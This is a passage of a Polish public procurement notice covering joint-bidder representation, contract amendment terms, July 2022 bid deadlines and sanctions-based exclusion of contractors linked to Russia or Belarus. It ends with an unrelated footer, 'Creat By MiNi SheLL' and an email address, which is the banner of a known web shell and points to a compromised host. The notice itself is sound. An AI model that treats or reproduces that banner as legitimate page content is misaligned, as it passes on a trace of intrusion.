&#34;Oświadczenie,<br/>które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy” – jeżeli<br/>w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia polegają na zdolnościach tych Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane (wzór oświadczenia stanowi załącznik<br/>nr 4 do SWZ).3. Pełnomocnictwo. Wykonawcy składający ofertę wspólną zobowiązani są do<br/>ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo pełnomocnika do<br/>reprezentowania ich w postępowaniu oraz do zawarcia umowy w sprawie zamówienia.<br/>Dokument (lub dokumenty) zawierający ustanowienie pełnomocnika musi być podpisany w<br/>imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, przez<br/>osoby uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze lub<br/>ewidencji oraz zostać złożony wraz z ofertą. Wszelka korespondencja prowadzona będzie<br/>wyłącznie z pełnomocnikiem.Pełnomocnictwo powinno być złożone w oryginale lub w postaci<br/>cyfrowego odwzorowania dokumentu sporządzonego w postaci papierowej (elektronicznej<br/>kopii), poświadczonej za zgodność z oryginałem przez mocodawcę albo notarialnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiany mogą być wprowadzone w przypadku wystąpienia co najmniej jednej z wymienionych we wzorze umowy okoliczności oraz gdy zostaną uwzględnione, opisane w niej warunki wprowadzenia tych zmian. Wzór umowy stanowi załącznik nr 10.1 do SWZ dla zadania częściowego nr 1 lub 10.2 do SWZ dla zadania częściowego nr 2. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę, wraz z załącznikami, należy złożyć za pośrednictwem Platformy. https://platformazakupowa.pl/pn/lasy_krasiczyn</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-07 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W oparciu o art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835), w celu<br/>przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r., wobec osób i<br/>podmiotów wpisanych na listę, o której mowa w art. 2 tej ustawy albo zamieszczonych w wykazach określonych w<br/>rozporządzeniu nr 765/2006 dotyczącym środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w<br/>agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str. 1, z późn. zm.) lub rozporządzeniu nr 269/2014 w sprawie<br/>środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i nie-zależność<br/>Ukrainy lub im zagrażających (Dz. Urz. UE L 78 z 17.03.2014, str. 6, z późn. zm.), stosuje się sankcje polegające na tym, że<br/>z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawcę:<br/>a: wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę<br/>na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu wykluczenia z postępowania;<br/>b: którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy<br/>oraz finansowaniu terroryzmu (Dz.U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu wykluczenia z postępowania;<br/>c: którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz.U.<br/>z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został<br/>wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu wykluczenia z postępowania.<br/>d: Wykluczenie następuje na okres trwania okoliczności określonych w Dziale 6 ust. 9.

Creat By MiNi SheLL
Email: jattceo@gmail.com